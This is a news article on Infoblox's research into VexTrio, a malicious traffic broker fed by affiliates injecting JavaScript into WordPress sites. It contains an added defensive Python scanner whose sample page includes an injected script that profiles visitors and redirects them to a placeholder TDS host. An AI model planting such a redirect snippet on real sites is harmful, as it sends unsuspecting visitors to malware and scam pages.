Cybercrime’s Silent Operator: The Unraveling of VexTrio’s Malicious Network Empire

VexTrio is a traffic direction system (TDS) with more than 60 affiliates feeding an unknown number of malicious campaigns.

VexTrio is a massive and complex malicious TDS (traffic direction system) organization. It has a network of more than 60 affiliates that divert traffic into VexTrio, while it also operates its own TDS network. While aspects of the operation have been discovered and analyzed by different researchers, the core network has remained largely unknown.

Two of the affiliates, for example, are ClearFake and SocGholish — both known through their malware. VexTrio, however, is purely a traffic broker; it is not tied to, or identified by, any malware family of its own.

Infoblox, a network visibility and control firm, has been tracking VexTrio for nearly two years, but has only more recently come to understand the extent of the operations. Its report published today describes the size and pervasiveness of the organization.

There appears to be a stable relationship between affiliates and VexTrio: SocGholish has partnered with VexTrio for nearly two years at least, while ClearFake has had such a partnership throughout its lifetime.

A TDS is commonly used to connect visitors with targeted advertising based on discovered characteristics of the visitor. A malicious TDS uses the same principles to connect visitors with malicious websites or pages. This is commonly achieved by compromising websites — very often WordPress sites — and injecting malicious code into the site. The code can discover characteristics of the visitor before selecting the next action.

Each of the affiliates has its own TDS network. Some simply send the details to VexTrio. Others will use some of the opportunities themselves and send the rest to VexTrio, depending on the visitor. For example, notes the report, “SocGholish only targets Windows OS users that are first-time visitors, according to their User-Agent, IP address, and browser cookies. For visitors that are incompatible with SocGholish exploitation methods (e.g., macOS devices), the actors will still capitalize on the web traffic by redirecting them to VexTrio TDS servers.”

The most common method of collecting traffic used by the affiliates is a drive-by compromise targeting vulnerable WordPress sites. Malicious JavaScript is injected into the HTML pages. The complexity of the JavaScript varies between the affiliates, but it typically acts as a redirect to VexTrio servers. It is not unknown for a single site to be compromised by multiple affiliates. In this case, VexTrio rewards the affiliates on a first come, first served basis.
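The injection pattern described above (a script dropped into a compromised site's HTML that profiles the visitor by User-Agent and cookies, then redirects to a TDS host) leaves two signatures a site owner can check for: script tags loading from hosts the site never intended to use, and inline scripts that combine visitor fingerprinting with a redirect sink. The following Python scanner is an added example, not code from Infoblox or from this article; the allowlist, the `.invalid` hostnames and the sample HTML are constructed for illustration.

```python
"""Scan HTML for script injections of the kind used by TDS redirect chains.

Added example, not Infoblox's or the article's code. It flags:
  * <script src> tags whose host is outside a site-owner allowlist, and
  * inline scripts that combine visitor fingerprinting (User-Agent, cookies)
    with a location redirect, or obfuscation helpers with a redirect.
The allowlist and sample HTML below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts this site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

# Visitor profiling APIs, redirect sinks and common obfuscation helpers.
FINGERPRINT_RE = re.compile(
    r"navigator\.(userAgent|platform)|document\.cookie|localStorage", re.I)
REDIRECT_RE = re.compile(
    r"(window|document|top)\.location|location\.(href|replace|assign)", re.I)
OBFUSCATION_RE = re.compile(
    r"\b(eval|atob|unescape|String\.fromCharCode)\s*\(", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external_srcs = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external_srcs.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail, evidence) findings for one HTML page."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external_srcs:
        # Relative paths have no host and are treated as same-origin.
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(("external_script", host, src))
    for code in parser.inline:
        fingerprints = bool(FINGERPRINT_RE.search(code))
        redirects = bool(REDIRECT_RE.search(code))
        obfuscated = bool(OBFUSCATION_RE.search(code))
        if redirects and (fingerprints or obfuscated):
            reason = "fingerprint+redirect" if fingerprints else "obfuscation+redirect"
            findings.append(("inline_redirect", reason, code.strip()[:120]))
    return findings


# Constructed sample page: two legitimate scripts, one injected loader from an
# unknown host, one injected inline redirect that profiles first-time Windows
# visitors, and one benign inline script that must not be flagged.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="https://cdn.example-site.test/theme.js"></script>
<script src="//static.tds-placeholder.invalid/loader.js"></script>
<script>
(function(){
  if (navigator.userAgent.indexOf("Windows") !== -1 && document.cookie.indexOf("seen=1") === -1) {
    document.cookie = "seen=1; path=/";
    window.location.replace("https://redirect.tds-placeholder.invalid/?u=" + encodeURIComponent(location.href));
  }
})();
</script>
<script>console.log("benign analytics stub");</script>
</head><body>Hello</body></html>"""

if __name__ == "__main__":
    for kind, detail, evidence in scan_html(SAMPLE_HTML):
        print(f"{kind:16} {detail:24} {evidence}")
```

Running the block over the constructed page reports the unknown loader host and the fingerprint-plus-redirect inline script, and nothing for the same-origin, allowlisted or benign scripts. Run against a site's own HTML, the same logic serves as a cheap integrity check; a second tell mentioned in the article, the DNS footprint of the redirect chain, is visible in resolver logs rather than in page content and is not covered here.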

VexTrio consequently combines traffic from multiple affiliates with traffic garnered from its own TDS network. Sometimes it may use this traffic in its own malicious campaigns, but will otherwise sell the details to other actors for separate malware, phishing, or various scam purposes.

VexTrio has become a major broker in the criminal underworld. It comprises more than 70,000 known domains, nearly half of which Infoblox has observed within its own customers. “We have seen VexTrio activity in as much as 19% of networks on a single day since 2020, and in over half of all customer networks in the last two years,” comment the researchers.

Image Credit: Infoblox

There is always a cat and mouse game between cybercriminals and security defenders. VexTrio has been a prolific actor using DNS to carry out attacks across the globe. DNS leaves a heavy footprint in network logs. This may not stop an operation but allows researchers to study the attacker. Recently, notes Infoblox, VexTrio has migrated a large portion of its infrastructure to shared hosting providers, making them more difficult – but not impossible – to track. 

Another method designed to avoid researchers is a delay between compromise and effect. The researchers purposely activated a VexTrio campaign known as robot Captcha, with no immediate effect. But, “After waiting 24 hours and performing a system reboot,” note the researchers, “our test machine received many push notifications disguised as messages from McAfee.”

The complex business model operated by VexTrio has enabled it to remain nameless for the last six years. It is now known. That same complexity, however, makes it very resilient and difficult to take down.

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.
